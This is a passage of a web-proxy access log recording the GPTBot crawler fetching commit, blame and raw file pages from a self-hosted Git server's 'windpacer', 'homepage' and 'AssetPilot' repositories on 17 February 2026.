74.7.227.38] [Length 10402] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15926] [Gzip 7.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" +[17/Feb/2026:14:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14284] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16994] [Gzip 8.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14985] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10806] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10695] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10829] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13819] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" +[17/Feb/2026:14:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10140] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10377] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" +[17/Feb/2026:14:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9856] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9851] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9853] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9867] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9851] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" +[17/Feb/2026:14:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9853] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9857] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" +[17/Feb/2026:14:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9860] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9851] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" [Client 74.7.227.38] [Length 22469] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" +[17/Feb/2026:14:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues" [Client 74.7.227.38] [Length 10101] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" +[17/Feb/2026:14:04:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" +[17/Feb/2026:14:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 14029] [Gzip 6.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" +[17/Feb/2026:14:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 9969] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static" +[17/Feb/2026:14:04:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 10006] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static" +[17/Feb/2026:14:04:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 13073] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" +[17/Feb/2026:14:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13131] [Gzip 6.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" +[17/Feb/2026:14:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 12327] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" +[17/Feb/2026:14:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 17036] [Gzip 8.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:14:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 12322] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" +[17/Feb/2026:14:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 13080] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" +[17/Feb/2026:14:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones" [Client 74.7.227.38] [Length 8462] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:14:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 25025] [Gzip 10.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:14:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" [Client 74.7.227.38] [Length 334] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" +[17/Feb/2026:14:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot.rss" [Client 74.7.227.38] [Length 7854] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" +[17/Feb/2026:14:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" [Client 74.7.227.38] [Length 9883] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:14:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 12855] [Gzip 6.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 11665] [Gzip 4.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 11663] [Gzip 4.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 